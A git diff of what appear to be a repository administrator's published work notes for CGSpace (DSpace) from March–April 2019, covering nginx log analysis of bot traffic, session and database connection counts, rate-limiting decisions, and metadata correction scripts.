    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         354 18.195.78.144
         363 190.216.179.100
         386 40.77.167.185
    @@ -898,23 +898,23 @@ org.postgresql.util.PSQLException: This statement has been closed.
     
    • Surprisingly they are re-using their Tomcat session:
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
     1
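
Counting distinct sessions for one client can be sketched in Python as well. This is an illustrative sketch only: `sessions_for_ip` is a hypothetical helper, it handles IPv4 addresses only, and the text after `ip_addr=` in the sample lines is invented. Unlike the grep pattern above, the IP is compared literally, so the dots cannot match other characters.

```python
import re

# Same fields as the grep pattern: a 32-character session ID followed by an IPv4 address.
SESSION_RE = re.compile(r"session_id=([A-Z0-9]{32}):ip_addr=(\d{1,3}(?:\.\d{1,3}){3})")


def sessions_for_ip(lines, ip):
    """Return the set of distinct session IDs seen for the given IP address."""
    sessions = set()
    for line in lines:
        for match in SESSION_RE.finditer(line):
            if match.group(2) == ip:
                sessions.add(match.group(1))
    return sessions


# Invented log lines for illustration; only the session_id/ip_addr fields follow the notes.
sid_a = "A" * 32
sid_b = "B" * 32
sample = [
    f"INFO session_id={sid_a}:ip_addr=93.179.69.74:view_item",
    f"INFO session_id={sid_a}:ip_addr=93.179.69.74:view_item",
    f"INFO session_id={sid_b}:ip_addr=192.0.2.5:view_item",
]
print(len(sessions_for_ip(sample, "93.179.69.74")))
```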
     
    • That’s weird because the total number of sessions today seems low compared to recent days:
    -
    $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
     5657
    -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
     17710
    -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
     17179
    -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
    +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     7904
     
    • PostgreSQL seems to be pretty busy:
    -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
          11 dspaceApi
          10 dspaceCli
          67 dspaceWeb
    @@ -931,7 +931,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • UptimeRobot says CGSpace went down again and I see the load is again at 14.0!
  • Here are the top IPs in nginx logs in the last hour:
  • -
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
    +
    # zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
           3 35.174.184.209
           3 66.249.66.81
           4 104.198.9.108
    @@ -942,7 +942,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
         414 45.5.184.72
         535 45.5.186.2
        2014 205.186.128.185
    -# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         157 41.204.190.40
         160 18.194.46.84
         160 54.70.40.11
    @@ -960,7 +960,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • I will add these three to the “bad bot” rate limiting that I originally used for Baidu
  • Going further, these are the IPs making requests to Discovery and Browse pages so far today:
  • -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "(discover|browse)" | grep -E "26/Mar/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "(discover|browse)" | grep -E "26/Mar/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         120 34.207.146.166
         128 3.91.79.74
         132 108.179.57.67
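
The "top IPs" pipelines above can be approximated in Python with a `Counter`. This is a sketch under assumptions: `top_clients` is a hypothetical helper, the client address is assumed to be the first whitespace-separated field (as `awk '{print $1}'` assumes), and the sample lines use documentation-only addresses rather than real traffic. Note that `most_common` returns the busiest clients first, whereas `sort -n | tail` lists them last.

```python
import re
from collections import Counter


def top_clients(lines, date_marker, path_pattern=r"(discover|browse)", limit=10):
    """Return (ip, hits) pairs for lines matching the date marker and path pattern."""
    path_re = re.compile(path_pattern)
    counts = Counter()
    for line in lines:
        if date_marker in line and path_re.search(line):
            fields = line.split()
            if fields:
                counts[fields[0]] += 1  # first field is assumed to be the client IP
    return counts.most_common(limit)


# Invented access log lines for illustration only.
sample = [
    '192.0.2.10 - - [26/Mar/2019:06:01:02 +0100] "GET /discover?query=rice HTTP/1.1" 200 1234',
    '192.0.2.10 - - [26/Mar/2019:06:01:05 +0100] "GET /browse?type=subject HTTP/1.1" 200 1234',
    '192.0.2.20 - - [26/Mar/2019:06:02:00 +0100] "GET /discover HTTP/1.1" 200 1234',
    '192.0.2.20 - - [26/Mar/2019:06:02:09 +0100] "GET /handle/10568/1 HTTP/1.1" 200 1234',
    '192.0.2.30 - - [25/Mar/2019:23:59:59 +0100] "GET /discover HTTP/1.1" 200 1234',
]
print(top_clients(sample, "26/Mar/2019:"))
```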
    @@ -978,7 +978,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)
  • Looking at the database usage I’m wondering why there are so many connections from the DSpace CLI:
  • -
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
    +
    $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
            5 dspaceApi
          10 dspaceCli
          13 dspaceWeb
    @@ -987,19 +987,19 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
     
  • Make a minor edit to my agrovoc-lookup.py script to match subject terms with parentheses like COCOA (PLANT)
  • Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week
  • -
    $ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
    -$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
    +
    $ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
    +$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
     
    • UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0
    • Looking at the nginx logs I don’t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:
    -
    # grep SemrushBot /var/log/nginx/access.log | grep -E "26/Mar/2019" | grep -E '(discover|browse)' | wc -l
    +
    # grep SemrushBot /var/log/nginx/access.log | grep -E "26/Mar/2019" | grep -E '(discover|browse)' | wc -l
     2931
     
    • So I’m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with “bot” in the name for a few days to see if things calm down… maybe not just yet
    • Otherwise, these are the top users in the web and API logs the last hour (18–19):
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
          54 41.216.228.158
          65 199.47.87.140
          75 157.55.39.238
    @@ -1010,7 +1010,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
         277 2a01:4f8:13b:1296::2
         291 66.249.66.80
         328 35.174.184.209
    -# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           2 2409:4066:211:2caf:3c31:3fae:2212:19cc
           2 35.10.204.140
           2 45.251.231.45
    @@ -1025,7 +1025,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
     
  • For the XMLUI I see 18.195.78.144 and 18.196.196.108 requesting only CTA items and with no user agent
  • They are responsible for almost 1,000 XMLUI sessions today:
  • -
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
    +
    $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
     937
     
    • I will add their IPs to the list of bot IPs in nginx so I can tag them as bots and let Tomcat’s Crawler Session Manager Valve force them to re-use their session
    • @@ -1033,7 +1033,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
    • I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request
    • I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages
    -
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E "26/Mar/2019:" | grep -E '(discover|browse)' | wc -l                                        
    +
    # zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E "26/Mar/2019:" | grep -E '(discover|browse)' | wc -l                                        
     119
     
    • What’s strange is that I can’t see any of their requests in the DSpace log…
    • @@ -1045,7 +1045,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
    • Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery
    • What the hell is going on with this CTA publication?
    -
    # grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
    +
    # grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
           1 37.48.65.147
           1 80.113.172.162
           2 108.174.5.117
    @@ -1077,7 +1077,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
     
     
  • In other news, I see that it’s not even the end of the month yet and we have 3.6 million hits already:
  • -
    # zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
    +
    # zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
     3654911
     
    • In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up
    • @@ -1105,7 +1105,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
    • It is frustrating to see that the load spikes from our own legitimate load on the server were very aggravated and drawn out by the contention for CPU on this host
    • We had 4.2 million hits this month according to the web server logs:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
     4218841
     
     real    0m26.609s
    @@ -1114,7 +1114,7 @@ sys     0m2.551s
     
    • Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in 2018-10:
    -
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     ...
     0.33s user 0.07s system 2% cpu 17.167 total
     0.27s user 0.04s system 1% cpu 16.643 total
    @@ -1137,7 +1137,7 @@ sys     0m2.551s
     
  • Looking at the weird issue with shitloads of downloads on the CTA item again
  • The item was added on 2019-03-13 and these three IPs have attempted to download the item’s bitstream 43,000 times since it was added eighteen days ago:
  • -
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
    +
    # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
          42 196.43.180.134
         621 185.247.144.227
        8102 18.194.46.84
    @@ -1168,16 +1168,16 @@ sys     0m2.551s
     
     
     
    -
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. 
DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
    +
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. 
DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
     
    • The response payload for the second one is the same:
    -
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. 
DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
    +
    _altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. 
DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
     
    • Very interesting to see this in the response:
    -
    "handles":["10568/89975","10568/89846"],
    -"handle":"10568/89975"
    +
    "handles":["10568/89975","10568/89846"],
    +"handle":"10568/89975"
     
    • On further inspection I see that the Altmetric explorer pages for each of these Handles are actually doing the right thing:
    diff --git a/docs/2019-04/index.html b/docs/2019-04/index.html
    index 8b6e3c676..6af1198ef 100644
    --- a/docs/2019-04/index.html
    +++ b/docs/2019-04/index.html
    @@ -64,7 +64,7 @@ $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u ds
     $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
     $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
     "/>
    -
    +
    @@ -163,16 +163,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
        4432 200
     
    • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
    • Apply country and region corrections and deletions on DSpace Test and CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
    -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
    -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
    +
    $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
    +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
    +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
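
The status-code tally for the Spore PDF earlier in this entry (`grep | awk '{print $9}' | sort | uniq -c`) could also be done in Python when the filtering gets more involved. This is only a minimal sketch: the function name and the sample log lines are hypothetical, and it assumes nginx's combined log format, where the client IP is the first whitespace-separated field and the status code the ninth. Unlike the `grep -E` above, it only matches the IP in the first field.

```python
from collections import Counter


def count_status_codes(lines, ips, needle):
    """Count HTTP status codes for requests from `ips` whose line contains `needle`."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        # Skip anything too short to be a combined-format access log line
        if len(fields) < 9:
            continue
        # fields[0] is the client IP, fields[8] is the status code (awk's $9)
        if fields[0] in ips and needle in line:
            counts[fields[8]] += 1
    return counts


# Hypothetical sample lines, not taken from the real logs
SAMPLE_LINES = [
    '18.196.196.108 - - [01/Apr/2019:10:00:00 +0200] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "example"',
    '18.195.78.144 - - [01/Apr/2019:10:00:01 +0200] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "example"',
    '203.0.113.5 - - [01/Apr/2019:10:00:02 +0200] "GET /bitstream/handle/10568/100289/Spore-192-EN-web.pdf HTTP/1.1" 200 68078 "-" "example"',
    '18.195.218.6 - - [01/Apr/2019:10:00:03 +0200] "GET /handle/10568/100289 HTTP/1.1" 200 1234 "-" "example"',
]
SUSPECT_IPS = {"18.196.196.108", "18.195.78.144", "18.195.218.6"}

if __name__ == "__main__":
    tally = count_status_codes(SAMPLE_LINES, SUSPECT_IPS, "Spore-192-EN-web.pdf")
    for status, count in sorted(tally.items()):
        print(count, status)
```

To run it against the real logs, the lines could be read from `/var/log/nginx/access.log` and `access.log.1` instead of the sample list.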
     

    2019-04-02

    • CTA says the Amazon IPs are AWS gateways for real user traffic
    • @@ -191,7 +191,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    -
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-04-03-orcid-ids.txt
    +
    $ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-04-03-orcid-ids.txt
     
    • We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!
    • Next I will resolve all their names using my resolve-orcids.py script:
    • @@ -201,7 +201,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
    • After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim
    • One user’s name has changed so I will update those using my fix-metadata-values.py script:
    -
    $ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
    +
